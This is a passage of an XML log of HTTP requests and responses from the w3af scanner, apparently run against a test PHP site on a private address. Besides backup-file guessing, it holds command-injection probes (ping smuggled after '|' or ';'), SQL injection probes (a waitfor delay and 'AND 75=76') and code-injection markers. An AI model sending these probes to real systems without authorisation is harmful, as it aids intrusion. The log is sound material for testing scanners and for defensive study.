&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="751">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="766">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="768">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27tuyzr%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about echo+str_repeat%28%27tuyzr%27%2C5%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='echo+str_repeat%28%27tuyzr%27%2C5%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="771">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/75+AND+75%3D76+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 75+AND+75%3D76+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='75+AND+75%3D76+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="260">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27tuyzr%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27tuyzr%27x5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27tuyzr%27x5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27tuyzr%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27tuyzr%27%2A5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27tuyzr%27%2A5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
